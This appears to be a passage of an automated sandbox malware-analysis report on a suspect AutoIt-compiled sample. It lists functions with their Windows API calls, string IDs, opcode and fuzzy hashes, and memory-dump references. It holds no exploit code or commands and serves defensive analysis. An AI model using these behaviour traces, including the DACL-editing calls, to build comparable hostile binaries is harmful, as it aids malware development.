                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 6525b816810f51879d9d7928b828784ca22cde49fe7d4aad3dcba0420d4a148b
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 66019278A00209EFCB44DF98C5909AEF7B5FF48310F608599E809A7701D731AE41DB80
                        Function 00961E70 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        Function 00A02ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00A02B30
                        • DeleteObject.GDI32(00000000), ref: 00A02B43
                        • DestroyWindow.USER32 ref: 00A02B52
                        • GetDesktopWindow.USER32 ref: 00A02B6D
                        • GetWindowRect.USER32(00000000), ref: 00A02B74
                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A02CA3
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A02CB1
                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02CF8
                        • GetClientRect.USER32(00000000,?), ref: 00A02D04
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A02D40
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D62
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D75
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D80
                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D89
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02D98
                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DA1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DA8
                        • GlobalFree.KERNEL32(00000000), ref: 00A02DB3
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02DC5
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A1FC38,00000000), ref: 00A02DDB
                        • GlobalFree.KERNEL32(00000000), ref: 00A02DEB
                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A02E11
                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A02E30
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A02E52
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A0303F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: e74de03193ddc810eadf6924ba3652a72bac2b10d83ec6fb9245244efb2339af
                        • Instruction ID: 51dbfbcc6508dc7f5d3c5d95e3e81a0a6451272ceafaf17bf12cab2e66858476
                        • Opcode Fuzzy Hash: e74de03193ddc810eadf6924ba3652a72bac2b10d83ec6fb9245244efb2339af
                        • Instruction Fuzzy Hash: 1B028B71900209AFDB14DFA4DC89FAE7BB9FB49720F148158F915AB2A1CB70ED01CB60
                        Function 00A170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                        Download Yara Rule
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 00A1712F
                        • GetSysColorBrush.USER32(0000000F), ref: 00A17160
                        • GetSysColor.USER32(0000000F), ref: 00A1716C
                        • SetBkColor.GDI32(?,000000FF), ref: 00A17186
                        • SelectObject.GDI32(?,?), ref: 00A17195
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A171C0
                        • GetSysColor.USER32(00000010), ref: 00A171C8
                        • CreateSolidBrush.GDI32(00000000), ref: 00A171CF
                        • FrameRect.USER32(?,?,00000000), ref: 00A171DE
                        • DeleteObject.GDI32(00000000), ref: 00A171E5
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00A17230
                        • FillRect.USER32(?,?,?), ref: 00A17262
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A17284
                          • Part of subcall function 00A173E8: GetSysColor.USER32(00000012), ref: 00A17421
                          • Part of subcall function 00A173E8: SetTextColor.GDI32(?,?), ref: 00A17425
                          • Part of subcall function 00A173E8: GetSysColorBrush.USER32(0000000F), ref: 00A1743B
                          • Part of subcall function 00A173E8: GetSysColor.USER32(0000000F), ref: 00A17446
                          • Part of subcall function 00A173E8: GetSysColor.USER32(00000011), ref: 00A17463
                          • Part of subcall function 00A173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A17471
                          • Part of subcall function 00A173E8: SelectObject.GDI32(?,00000000), ref: 00A17482
                          • Part of subcall function 00A173E8: SetBkColor.GDI32(?,00000000), ref: 00A1748B
                          • Part of subcall function 00A173E8: SelectObject.GDI32(?,?), ref: 00A17498
                          • Part of subcall function 00A173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00A174B7
                          • Part of subcall function 00A173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A174CE
                          • Part of subcall function 00A173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00A174DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                        • String ID:
                        • API String ID: 4124339563-0
                        • Opcode ID: b40246a021757c4871ab87a45a4f2230223ab8eb7bf073f358406e490d743211
                        • Instruction ID: 3e526358c7c758e4d17de72caf896cf69b56a2eab741ba1bac56109b4e70e91a
                        • Opcode Fuzzy Hash: b40246a021757c4871ab87a45a4f2230223ab8eb7bf073f358406e490d743211
                        • Instruction Fuzzy Hash: 60A17F72088301BFD701DFA4DC48A9E7BBAFB49330F105B19F962961A1D771E9468B51
                        Function 00998D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?), ref: 00998E14
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 009D6AC5
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009D6AFE
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009D6F43
                          • Part of subcall function 00998F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00998BE8,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998FC5
                        • SendMessageW.USER32(?,00001053), ref: 009D6F7F
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009D6F96
                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D6FAC
                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D6FB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 2760611726-4108050209
                        • Opcode ID: c9c5642d2573558c33c166c10a4f3f0a6f50c2f7ae3d84e94eab8b202327e918
                        • Instruction ID: a99e3c60529f6b6535fd02e1ed5296407f0a49c739937e5c85c41db059deb185
                        • Opcode Fuzzy Hash: c9c5642d2573558c33c166c10a4f3f0a6f50c2f7ae3d84e94eab8b202327e918
                        • Instruction Fuzzy Hash: F312BD30244211DFDB25DF68D854BBAB7E9FB49310F14846EF4998B261CB35EC92CB91
                        Function 00A02711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 00A0273E
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A0286A
                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A028A9
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A028B9
                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A02900
                        • GetClientRect.USER32(00000000,?), ref: 00A0290C
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A02955
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A02964
                        • GetStockObject.GDI32(00000011), ref: 00A02974
                        • SelectObject.GDI32(00000000,00000000), ref: 00A02978
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A02988
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A02991
                        • DeleteDC.GDI32(00000000), ref: 00A0299A
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A029C6
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A029DD
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A02A1D
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A02A31
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A02A42
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A02A77
                        • GetStockObject.GDI32(00000011), ref: 00A02A82
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A02A8D
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A02A97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 895242c2b9885ec98663178fc4c42c8acce3e3c69ff369d2a56579a48ea6219e
                        • Instruction ID: 8475ba6bc890c3d0e2f8b696d1ba927ca2fec67f95b48c2b6aa8f0cd5005c9f7
                        • Opcode Fuzzy Hash: 895242c2b9885ec98663178fc4c42c8acce3e3c69ff369d2a56579a48ea6219e
                        • Instruction Fuzzy Hash: E2B15A71A40219AFEB14DFA8DC49FAE7BA9FB48721F008514F914EB2D0D770AD41CBA4
                        Function 009F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F4AED
                        • GetDriveTypeW.KERNEL32(?,00A1CB68,?,\\.\,00A1CC08), ref: 009F4BCA
                        • SetErrorMode.KERNEL32(00000000,00A1CB68,?,\\.\,00A1CC08), ref: 009F4D36
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: 04121d1343306255866a21e0c1d1bf5b6c78dc268aaca7d97f59dfd09e5dff66
                        • Instruction ID: 0202261d857d61894efe601e322b6714125f5cff5ac6a98b6b92bca922140fbb
                        • Opcode Fuzzy Hash: 04121d1343306255866a21e0c1d1bf5b6c78dc268aaca7d97f59dfd09e5dff66
                        • Instruction Fuzzy Hash: 4161F63460520DEBCB04EF24C981EFE77B4BB85710B249815F946AB292DB39ED41DB52
                        Function 00A173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000012), ref: 00A17421
                        • SetTextColor.GDI32(?,?), ref: 00A17425
                        • GetSysColorBrush.USER32(0000000F), ref: 00A1743B
                        • GetSysColor.USER32(0000000F), ref: 00A17446
                        • CreateSolidBrush.GDI32(?), ref: 00A1744B
                        • GetSysColor.USER32(00000011), ref: 00A17463
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A17471
                        • SelectObject.GDI32(?,00000000), ref: 00A17482
                        • SetBkColor.GDI32(?,00000000), ref: 00A1748B
                        • SelectObject.GDI32(?,?), ref: 00A17498
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00A174B7
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A174CE
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A174DB
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A1752A
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A17554
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00A17572
                        • DrawFocusRect.USER32(?,?), ref: 00A1757D
                        • GetSysColor.USER32(00000011), ref: 00A1758E
                        • SetTextColor.GDI32(?,00000000), ref: 00A17596
                        • DrawTextW.USER32(?,00A170F5,000000FF,?,00000000), ref: 00A175A8
                        • SelectObject.GDI32(?,?), ref: 00A175BF
                        • DeleteObject.GDI32(?), ref: 00A175CA
                        • SelectObject.GDI32(?,?), ref: 00A175D0
                        • DeleteObject.GDI32(?), ref: 00A175D5
                        • SetTextColor.GDI32(?,?), ref: 00A175DB
                        • SetBkColor.GDI32(?,?), ref: 00A175E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: ab6957024b2a51b9882aeba17850723b6886bb9a74f881d1bd766f43e6a79650
                        • Instruction ID: afadafa78720fe52942a591abd9ac6e5cbebd819d7f6fa43c9d996b43fb188fb
                        • Opcode Fuzzy Hash: ab6957024b2a51b9882aeba17850723b6886bb9a74f881d1bd766f43e6a79650
                        • Instruction Fuzzy Hash: 15616C76940218BFDF01DFA4DC49AEEBFB9EB08330F109215F911AB2A1D7749981CB90
                        Function 00A10FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 00A11128
                        • GetDesktopWindow.USER32 ref: 00A1113D
                        • GetWindowRect.USER32(00000000), ref: 00A11144
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A11199
                        • DestroyWindow.USER32(?), ref: 00A111B9
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A111ED
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A1120B
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A1121D
                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00A11232
                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A11245
                        • IsWindowVisible.USER32(00000000), ref: 00A112A1
                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A112BC
                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A112D0
                        • GetWindowRect.USER32(00000000,?), ref: 00A112E8
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00A1130E
                        • GetMonitorInfoW.USER32(00000000,?), ref: 00A11328
                        • CopyRect.USER32(?,?), ref: 00A1133F
                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00A113AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: 32cf4b955392a341776d9c5930525657ffcfc6e7fa1943127fd7eec8c4dc9b0b
                        • Instruction ID: 1f6f4b78646a36d563a6bb60282cc1b22c1e849235714f0172847b09d009ed08
                        • Opcode Fuzzy Hash: 32cf4b955392a341776d9c5930525657ffcfc6e7fa1943127fd7eec8c4dc9b0b
                        • Instruction Fuzzy Hash: D1B18B71608341AFD700DF64C884BAAFBE4FF88750F00891CFA999B2A1D771E885CB91
                        Function 00998891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00998968
                        • GetSystemMetrics.USER32(00000007), ref: 00998970
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099899B
                        • GetSystemMetrics.USER32(00000008), ref: 009989A3
                        • GetSystemMetrics.USER32(00000004), ref: 009989C8
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 009989E5
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 009989F5
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00998A28
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00998A3C
                        • GetClientRect.USER32(00000000,000000FF), ref: 00998A5A
                        • GetStockObject.GDI32(00000011), ref: 00998A76
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00998A81
                          • Part of subcall function 0099912D: GetCursorPos.USER32(?), ref: 00999141
                          • Part of subcall function 0099912D: ScreenToClient.USER32(00000000,?), ref: 0099915E
                          • Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000001), ref: 00999183
                          • Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000002), ref: 0099919D
                        • SetTimer.USER32(00000000,00000000,00000028,009990FC), ref: 00998AA8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 31b33d90ac4662edf5676ddd10dc1ef23f6a638d1f037ab0b0825f9359d7bac9
                        • Instruction ID: 8ddc0b86529373805b0803e6d4481dc5c07d493f2a30bc26a7ca517dde6766dd
                        • Opcode Fuzzy Hash: 31b33d90ac4662edf5676ddd10dc1ef23f6a638d1f037ab0b0825f9359d7bac9
                        • Instruction Fuzzy Hash: 0CB15C71A80209DFDF14DFA8CC45BEE7BB5FB48325F10852AFA15AB290DB74A841CB50
                        Function 009E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
                          • Part of subcall function 009E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
                          • Part of subcall function 009E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
                          • Part of subcall function 009E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
                          • Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009E0DF5
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009E0E29
                        • GetLengthSid.ADVAPI32(?), ref: 009E0E40
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009E0E7A
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009E0E96
                        • GetLengthSid.ADVAPI32(?), ref: 009E0EAD
                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009E0EB5
                        • HeapAlloc.KERNEL32(00000000), ref: 009E0EBC
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009E0EDD
                        • CopySid.ADVAPI32(00000000), ref: 009E0EE4
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009E0F13
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E0F35
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009E0F47
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F6E
                        • HeapFree.KERNEL32(00000000), ref: 009E0F75
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F7E
                        • HeapFree.KERNEL32(00000000), ref: 009E0F85
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0F8E
                        • HeapFree.KERNEL32(00000000), ref: 009E0F95
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009E0FA1
                        • HeapFree.KERNEL32(00000000), ref: 009E0FA8
                          • Part of subcall function 009E1193: GetProcessHeap.KERNEL32(00000008,009E0BB1,?,00000000,?,009E0BB1,?), ref: 009E11A1
                          • Part of subcall function 009E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009E0BB1,?), ref: 009E11A8
                          • Part of subcall function 009E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009E0BB1,?), ref: 009E11B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
